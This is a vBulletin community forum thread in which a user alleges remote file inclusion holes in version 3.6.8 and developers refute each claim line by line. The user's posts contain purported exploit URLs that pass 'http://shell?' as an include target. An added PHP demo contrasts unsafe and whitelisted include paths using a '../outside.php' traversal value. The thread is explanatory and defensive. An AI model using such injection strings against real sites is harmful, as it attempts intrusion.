vBulletin Version 3.6.8 Vulnerabilities - Bogus

Collapse
This topic is closed.
  • vBulletin Version 3.6.8 Vulnerabilities - Bogus

    Hello,

    There are a number of gaps in Release 3.6.8; look for:

    in the includes files: in class_paid_subscription on line 621, in functions on line 89,
    in functions_cron on line 276, in functions_forumdisplay on line 59,
    in functions_misc on line 519, in functions_ranks on line 22,
    and in class_vurl on line 250.

    and in the install file:
    tableprefix on line 41.

    and in the admincp files:
    in cronadmin on line 110, in diagnostic on line 368, in diagnostic on line 594,
    and in plugin on line 721 and on line 831.

    Good luck.
    Arab vBulletin Team

  • #2
    Ok, this is just ridiculous. Searching files for the word "include" is not a vulnerability. Two of the lines you pointed to are COMMENTS! You know, explanation of the code!

    Then you picked up a function definition, probably because it's a class method named "exec".

    People love to have their name in lights... But this is just plain stupidity. It's not the first time either -- go take a look at all the people we had to "smack down" on SecurityFocus.

    And on another note... responsible disclosure would mean these would be reported via the support system or in a private bug report. Please do this in the future.

    • #3
      ok Mike
      Give me an email

      I am not stupid
      I am GeNiUs HaCkEr
      Search on Google, you will find me there, ok Mike

      • #4
        Ok if you want an explanation.

        includes/class_paid_subscriptions.php line 621
        PHP Code:
            if (file_exists(DIR . '/includes/paymentapi/class_' . $methodinfo['classname'] . '.php'))
            {
                require_once(DIR . '/includes/paymentapi/class_' . $methodinfo['classname'] . '.php');
            }
        First, it's in a class, so calling it directly isn't possible, but even if you could, $methodinfo comes directly from a database row. So please tell me where the exploit is here?

        --

        includes/functions.php line 81

        PHP Code:
            if (preg_match('#^\w+$#', $classtype))
            {
                $classtype = strtolower($classtype);
                if ($forcefile)
                {
                    $classfile = preg_replace('#[^a-z0-9_]#i', '', $forcefile);
                }
                else
                {
                    $classfile = str_replace('_multiple', '', $classtype);
                }
                require_once(DIR . '/includes/class_dm_' . $classfile . '.php');
            }
        Do you see that $classfile gets changed to make sure it only contains a-z0-9_? That doesn't include http://, so again no exploit here, even if you could force a call.

        --

        includes/functions_cron.php line 276

        PHP Code:
            if ($nextrun = build_cron_item($nextitem['cronid'], $nextitem))
            {
                include_once(DIR . '/' . $nextitem['filename']);
            }
        $nextitem is an array that comes directly from the database right above this call.

        --

        includes/functions_forumdisplay.php line 59

        PHP Code:
            // note: this function requires the use of $iconcache - include it in $specialtemplates!
        This isn't even code, it's a comment that includes the word include.

        --

        includes/functions_misc.php line 519

        PHP Code:
            // include the $, but escape it in the key
        Again, it's a comment, not even executed code.

        --

        includes/functions_ranks.php line 22

        PHP Code:
        // grab ranks since we didn't include 'ranks' in $specialtemplates 
        Another comment

        --

        includes/class_vurl.php line 250

        PHP Code:
            function exec($followlocation = false)
            {
                // ..
            }
        That's a function definition, not a PHP call, so there isn't one there.

        --

        install/tableprefix.php line 41

        PHP Code:
            require_once(DIR . "/{$vbulletin->config['Misc']['admincpdir']}/global.php");
        DIR is a constant, you can't change that, and the other is from a config file loaded directly above.

        --

        admincp/cronadmin.php line 110

        PHP Code:
            require_once(DIR . '/includes/functions_cron.php');
            include_once(DIR . '/' . $nextitem['filename']);
        $nextitem again comes from a database row directly above.

        --

        admincp/diagnostic.php line 368 + line 594

        PHP Code:
            while ($file = readdir($handle))
            {
                if (preg_match('#^md5_sums_.+$#siU', $file, $match))
                {
                    unset($md5_sum_softwareid);
                    include(DIR . "/includes/$match[0]");
                }
            }
        That's a shortened version, but it's loading files from the file system that match a certain pattern.

        PHP Code:
            require_once(DIR . '/includes/paymentapi/class_' . $api['classname'] . '.php');
        Again, this is a database row loaded directly above.

        --

        admincp/plugin.php line 721 + line 831

        PHP Code:
            $safeid = preg_replace('#[^a-z0-9_]#i', '', $product['productid']);
            if (file_exists(DIR . '/includes/version_' . $safeid . '.php'))
            {
                include_once(DIR . '/includes/version_' . $safeid . '.php');
            }
        Comes from a database row, but we even validate it just to be sure. Both lines you list are identical code.

        --

        Now, as you can see, that's why none of these are valid, and if you'd taken a few minutes to look at them before reporting, you'd have seen that as well.

        Can you even explain how a comment ended up getting shown in your results?
        Scott MacVicar

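        As an added illustration, not vBulletin's code and not posted by anyone in this thread, here is a small PHP script contrasting the shape that really is a file-inclusion bug (request input concatenated straight into the include path) with the shape Scott shows for admincp/plugin.php (constant base directory, fragment whitelisted to [a-z0-9_], file_exists check before the include). EXAMPLE_DIR, the fixture files and the function names are assumptions made for this demo; the "http://shell?" value is the one used in this thread.

```php
<?php
// Added example (not vBulletin code). Contrasts an include path built
// straight from request input with the pattern described above: a
// constant base directory plus a fragment reduced to [a-z0-9_] before
// it is used. EXAMPLE_DIR, the fixture files and the function names
// are assumptions made for this demo.

define('EXAMPLE_DIR', sys_get_temp_dir() . '/rfi_demo_' . getmypid());

/**
 * The shape that actually is local/remote file inclusion: the request
 * value is concatenated into the include path unchanged. Returned
 * rather than included so the demo can show the path without running it.
 */
function unsafe_include_path(string $userValue): string
{
    return EXAMPLE_DIR . '/includes/' . $userValue;
}

/**
 * The shape used in admincp/plugin.php: whitelist the fragment, pin it
 * between a constant directory and a fixed prefix/suffix, and check the
 * file exists before including. Returns null when nothing valid matches.
 */
function safe_include_path(string $fragment): ?string
{
    $safeid = preg_replace('#[^a-z0-9_]#i', '', $fragment);
    if ($safeid === '') {
        return null;
    }
    $path = EXAMPLE_DIR . '/includes/version_' . $safeid . '.php';
    return file_exists($path) ? $path : null;
}

function run_demo(): void
{
    // Constructed fixtures: one legitimate include target inside
    // includes/, and one file one level above it.
    mkdir(EXAMPLE_DIR . '/includes', 0700, true);
    file_put_contents(EXAMPLE_DIR . '/includes/version_vbulletin.php',
        "<?php\n\$loaded_version = '3.6.8';\n");
    file_put_contents(EXAMPLE_DIR . '/outside.php',
        "<?php\n\$loaded_version = 'attacker file';\n");

    $attacks = ['http://shell?', '../outside.php', 'outside.php'];
    foreach ($attacks as $a) {
        $unsafe = unsafe_include_path($a);
        printf("unsafe  %-16s -> %s (exists: %s)\n",
            $a, $unsafe, file_exists($unsafe) ? 'yes' : 'no');
        printf("safe    %-16s -> %s\n",
            $a, var_export(safe_include_path($a), true));
    }
    // Through the whitelist, "http://shell?" collapses to "httpshell" and
    // "../outside.php" to "outsidephp"; neither names an existing
    // version_*.php, so both give null. Through the unsafe builder,
    // "../outside.php" points at a real file that include would execute,
    // and the URL form would be fetched if allow_url_include were on.

    $path = safe_include_path('vbulletin');
    include_once $path;
    printf("legit   vbulletin        -> %s (\$loaded_version = %s)\n",
        $path, $loaded_version);

    unlink(EXAMPLE_DIR . '/includes/version_vbulletin.php');
    unlink(EXAMPLE_DIR . '/outside.php');
    rmdir(EXAMPLE_DIR . '/includes');
    rmdir(EXAMPLE_DIR);
}

run_demo();
```

        Run it with the php command-line binary. The point it makes is the one Scott makes above: the danger in an include is not the word "include" but where the path comes from, and a value that has been reduced to [a-z0-9_] and wrapped in a fixed prefix and suffix cannot name a URL or climb out of the includes directory.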


        • #5
          ok man
          Last edited by Dr.ExPoLiT; Mon 6th Aug '07, 10:51am.



          • #6
            Oy ve...
            Toddler from Hell



            • #7
              Haha. Top thread. Please move it to Chit Chat.



              • #8
                ok Scott i tell you exploits

                1st includes/class_paid_subscriptions.php line 621
                PHP Code:
                    if (file_exists(DIR . '/includes/paymentapi/class_' . $methodinfo['classname'] . '.php'))
                    {
                        require_once(DIR . '/includes/paymentapi/class_' . $methodinfo['classname'] . '.php');
                    }
                hacker can upload shell [evil code]
                from http://site/forum/includes/class_paid_subscriptions.php=http://shell?
                ----------
                2nd
                includes/functions.php line 81

                PHP Code:
                    if (preg_match('#^\w+$#', $classtype))
                    {
                        $classtype = strtolower($classtype);
                        if ($forcefile)
                        {
                            $classfile = preg_replace('#[^a-z0-9_]#i', '', $forcefile);
                        }
                        else
                        {
                            $classfile = str_replace('_multiple', '', $classtype);
                        }
                        require_once(DIR . '/includes/class_dm_' . $classfile . '.php');
                    }
                http://site/forum/includes/functions.php?classfile=http://shell?
                ---------
                3rd
                includes/functions_cron.php line 276
                PHP Code:
                    if ($nextrun = build_cron_item($nextitem['cronid'], $nextitem))
                    {
                        include_once(DIR . '/' . $nextitem['filename']);
                    }
                http://site/forum/includes/functions_cron.php?nextrun=http://shell?
                -------

                Is this sufficient or not

                If you side net send message and tell me what you now ok Scott MacVicar

                Next time I will be gaps in SecurityFocus

                good Luck.



                • #9
                  As Scott said above, all these variables are checked or set previously in the code.
                  Best Regards
                  Colin Frei



                  • #10
                    How dare anyone question Dr.ExPoLiT, he's teh 1337!

                    Seriously, if you think you've found an issue, the bug tracker is where it should be posted.


                    • #11
                      Originally posted by Dr.ExPoLiT:
                      ok Scott i tell you exploits
                      ...
                      So, you are patching your own forum when you find these exploits of course, right?

                      Where are you getting these php files from, because the devs patch any holes found within a day or so.



                      • #12
                        Rofl @ this thread



                        • #13
                          Are you saying that DIR can be changed? That is a constant that is set in the vB code somewhere with the full path to the forum. That cannot be exploited...


                          • #14
                            Originally posted by aranthorn:
                            How dare anyone question Dr.ExPoLiT, he's teh 1337!
                            I'd say what he posts is just rubbish .... Scott already explained to him there are no holes, still he .... and everybody, even somebody who has no idea what PHP code is, knows a comment is ignored by the PHP parser. Also you don't have to be very smart to open a PHP file, search for the word "include" and think it's a hole .... (as Mike already mentioned)

                            vBulletin has much work explaining to all the wannabes on SecurityFocus that they are wrong. I'm subscribed to that list, so I know ....



                            • #15
                              I think you missed the sarcasm.
